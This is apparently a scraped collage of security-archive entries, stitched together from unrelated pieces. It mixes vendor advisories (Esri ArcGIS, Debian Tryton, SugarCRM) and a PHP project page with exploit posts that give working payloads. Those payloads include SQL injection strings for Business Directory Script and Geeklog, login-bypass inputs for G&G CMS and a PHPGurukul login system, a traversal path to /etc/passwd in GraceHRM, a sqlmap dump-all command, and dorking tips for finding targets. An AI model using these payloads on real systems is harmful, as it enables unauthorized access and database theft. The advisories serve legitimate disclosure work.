




ArcGIS Enterprise Server versions 11.0 and below have an information disclosure vulnerability where a remote, unauthorized attacker may submit a crafted query that may result in a low severity information disclosure issue. 

The information disclosed is limited to a single attribute in a database connection string. No business data is disclosed.










The ArcGIS Server Map and Feature Service Security 2023 Update 1 Patch is now avaialble. This patch contains a fix for one Medium Severity Security vulnerability,  as well as fixes for other non-security related bugs.  Esri highly recommends customers using ArcGIS Enterprise 10.8.1 through ArcGIS 11.1 install this patch. Users with older versions under mature support should upgrade to ArcGIS Enterprise 11.1 and then install this patch.

This patch was released on 8/22/2023 and is available _here_.

Vulnerabilities fixed by this patch.

CVE-2023-25848: There is an information disclosure issue in ArcGIS Server.

ArcGIS Enterprise Server versions 11.0 and below have an information disclosure vulnerability where a remote, unauthorized attacker may submit a crafted query that may result in a low severity information disclosure issue.  
The information disclosed is limited to a single attribute in a database connection string. No business data is disclosed.

Impact: Information Disclosure  
CVSSv31: /AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C 4.8 (Moderate)  
Exploit Code Maturity: Proof of Concept  
Remediation Level: Official Fix  
Report Confidence: Confirmed

CWE-89  – Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Mitigation: secure the web service.

CVE-2023-25848: The ArcGIS Server Map and Feature Service Security 2023 Update 1 Patch is now available

Debian Linux Security Advisory 5482-1 - Edbo and Cedric Krier discovered that the Tryton application server does enforce record rules when only reading fields without an SQL type.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5482-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 24, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tryton-server  
CVE ID         : not yet available

"Edbo" and Cedric Krier discovered that the Tryton application server  
does enforce record rules when only reading fields without an SQL type  
(like Function fields).

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.0.33-2+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 6.0.29-2+deb12u1.

We recommend that you upgrade your tryton-server packages.

For the detailed security status of tryton-server please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tryton-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTnqjsACgkQEMKTtsN8  
TjbcjBAAmjWzeNl1H7A9skD50+wxRyOBQK+lrqpEcCekIit699viinOKJq4kKzsW  
/oZzZ8w+a/mKgcz9VgYUDuFE30h1kA43dMY9sb4GDpKRvXUGQ0bkbOYCBmktw+u1  
IWvYMccmTDCq9tnLh8yyrNV/q1/ZE2ZmC5ek2ASiXtmLKCYR3UoHxPjAHmYayD+o  
vVvPtmQ5/REr76+VCKupThY2+/Om4sxoeBoUvzH1O99QY5Na1QSZR1yfYzuTOF67  
LaiqwkTqiLr4kRtfE1ngcjuqWHrpOC14K7rMSn29sIYJLGQ0ILjpN73snZuUvlVz  
AAX+p1q61l/8mEJrMcDA//Qr1jMlZS4dk9SlkCfPofekFLv160pihc83NGJh/vPn  
KH62Bp71Fk9BLOqJOonITEHEoIrglecylwyjOy8cbg0X7AkaeLufZZjRV1VUS0yX  
Ff4n2qWMTjGEzqZeW9PVA6TTQ9ecSNfHzUF9qanI5F0eobSzhd4GefS9L6FL+hYi  
fZ9Em29e8y5SnQ+ePXCaBq5E78HIGb6f/+i2bzyRjAcaCKN4g0fO4PVIFXbmGHCC  
Wbp1DLX4T2Dpu5O60MtdlBjd538MSS7LLrvqcnaQNfNoD9ujEysM12BWP33QhwVK  
k4vrcxoQBj0P1vB08zQ3GhDfp6j9AxNLHDL5TP8gr1vJzmZfw5U=1vl7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5482-1

Business Directory Script version 3.2 suffers from a remote SQL injection vulnerability.

    ## Title: Business-Directory-Script-3.2 SQLi## Author: nu11secur1ty## Date: 08/25/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The `column` parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the column parameter, and adatabase error message was returned. You should review the contents ofthe error message, and the application's handling of other input, toconfirm whether a vulnerability is present. Additionally, the payload(select*from(select(sleep(20)))a) was submitted in the columnparameter. The application took 20271 milliseconds to respond to therequest, compared with 230 milliseconds for the original request,indicating that the injected SQL command caused a time delay. Theattacker can steal all information from the database of the server ofthis application!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: column (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)## Time spend:01:35:00

Business Directory Script 3.2 SQL Injection

Gravigra CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Gravigra CMS v1.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.alwafaagroup.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news.php?nid=1 ( inject her )[+] use payload : http://127.0.0.1/gravigracom/news.php?nid=1 ( inject her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gravigra CMS 1.0 SQL Injection

G and G Corporate CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0 Auth by Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : User & Pass : 'or''='[+] http://wwwpriolinoxeu/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

G And G Corporate CMS 1.0 SQL Injection

Geeklog version 2.1.0b1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Geeklog v2.1.0b1 Sql Injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.geeklog.net/                                                                                            || # Dork      : Powered by Geeklog                                                                                                 |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine.[+]  use Payload : calendar/index.php?view=day&day=05&month=10&year=2014 [+]  http://127.0.0.1/public_html/calendar/index.php?view=day&day=05&month=10&year=2014 (inject her)[+]  login : http://127.0.0.1/public_html/admin Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Geeklog 2.1.0b1 SQL Injection

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

User Registration and Login and User Management System version 3.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link:https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedProof Of Concept:1. Navigate to the admin login page.URL: http://192.168.1.5/loginsystem/admin/2. Enter "*admin' -- -*" in the admin username field and anythingrandom in the password field.3. Now you successfully logged in as admin.4. To download all the data from the database, use the below commands.  4.1. Login to the admin portal and capture the request.  4.2. Copy the intercepted request in a file.  4.3. Now use the below command to dump all the dataCommand:  sqlmap -r <file-name> -p username -D loginsystem --dump-allThanks and Regards,Ashutosh Singh Umath

User Registration And Login And User Management System 3.0 SQL Injection

Cross Site Scripting (XSS) vulnerability in sourcecodester Student Study Center Desk Management System 1.0 allows attackers to run arbitrary code via crafted GET request to web application URL.

Submitted by oretnom23 on Tuesday, March 14, 2023 - 15:32.

This project is entitled **Student Study Center Desk Management System**. It is a web-based application that was mainly developed using **PHP Language** and **MySQL Database**. The project's main purpose is to provide certain study center with a platform for managing the students' assigned or allocated desks. It has a pleasant user interface using **Bootstrap Framework** and **AdminLTE Template**. The project also contains multiple user-friendly features and functionalities.

****How does the Student Study Center Desk Management System?****

The Student Study Center Desk Management System is a project with one module which is the management site only that can be accessed by Administrator or Staff users. Here, the study center management can simply allocate or assign and unassign students to specific desks. The management is required to populate the list of students and list of the desk upon using the system for the first time. To manage the student desk allocation, management can simply redirect to the **"Assign"** page and select the student's name. Then, they can simply assign the student to a certain desk and manage the list of the history of the assigned records. This system also contains date-wise reports.

****What are the Features and Functionalities?****

The Student Study Center Desk Management System contains the following features and functionalities:

*   **Login and Logout**
*   **Dashboard Page**
*   **Student List Management**
*   **Desk List Management**
*   **Manage Student Desk Allocation**
*   **Generate Date-wise Reports**
*   **Manage System Users**
*   **Manage System Information**
*   **Update Account Details**

****What are the Technologies used?****

Here are the technologies that I used to develop this **Student Study Center Desk Management System**:

*   **XAMPP**
*   **VS Code Editor**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **DataTables Library**
*   **Select2 Library**
*   **Bootstrap Framework**
*   **AdminLTE Template**
*   **Fontawesome Icons**

****Snapshots********Dashboard****

****Student List****

****Desk List****

****Student Assign/Unassigned Records****

****Reports****

The **Students Study Center Desk Management System** project source code zip file is provided on this website and it is free to download. The project was mainly developed for educational purposes only. Feel free to download and modify the project source code to meet your own requirements.

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** named ****sscdms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****sscdms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Student Study Center Desk Management System** in a **browser**. i.e. ****http://localhost/php-sscdms/****.

****Default Admin Access****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it! I hope this **Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code Project** will help you with what you are looking for and that you'll find something useful for your current and future PHP Projects.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy =)****

*   4512 views

CVE-2023-36317: Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code

SugarCRM versions 12.2.0 and below suffer from multiple remote SQL injection vulnerabilities.

----------------------------------------------------  
SugarCRM <= 12.2.0 Two SQL Injection Vulnerabilities  
----------------------------------------------------

[-] Software Link:

https://www.sugarcrm.com

[-] Affected Versions:

Version 12.2.0 and prior versions.  
Version 12.0.2 and prior versions.  
Version 11.0.5 and prior versions.

[-] Vulnerabilities Description:

1) User input passed through the “metrics” parameter to the   
“/Forecasts/metrics”  
REST API endpoint is not properly sanitized before being used to   
construct a SQL  
query. This can be exploited by malicious users to e.g. read sensitive   
data from  
the database through in-band SQL Injection attacks.

2) User input passed through the “placeholder_fields” parameter to the   
e.g.  
“/Notes/{recordID}/link/history” REST API endpoint is not properly   
sanitized before  
being used to construct a SQL query. This can be exploited by malicious   
users to  
e.g. read sensitive data from the database through in-band SQL Injection   
attacks.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-35811_1.php  
https://karmainsecurity.com/pocs/CVE-2023-35811_2.php

[-] Solution:

Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.

[-] Disclosure Timeline:

[14/02/2023] - Vendor notified  
[12/04/2023] - Fixed versions released  
[17/06/2023] - CVE number assigned  
[23/08/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-35811 to these vulnerabilities.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-08

[-] Other References:

https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-008/

Tag

#sql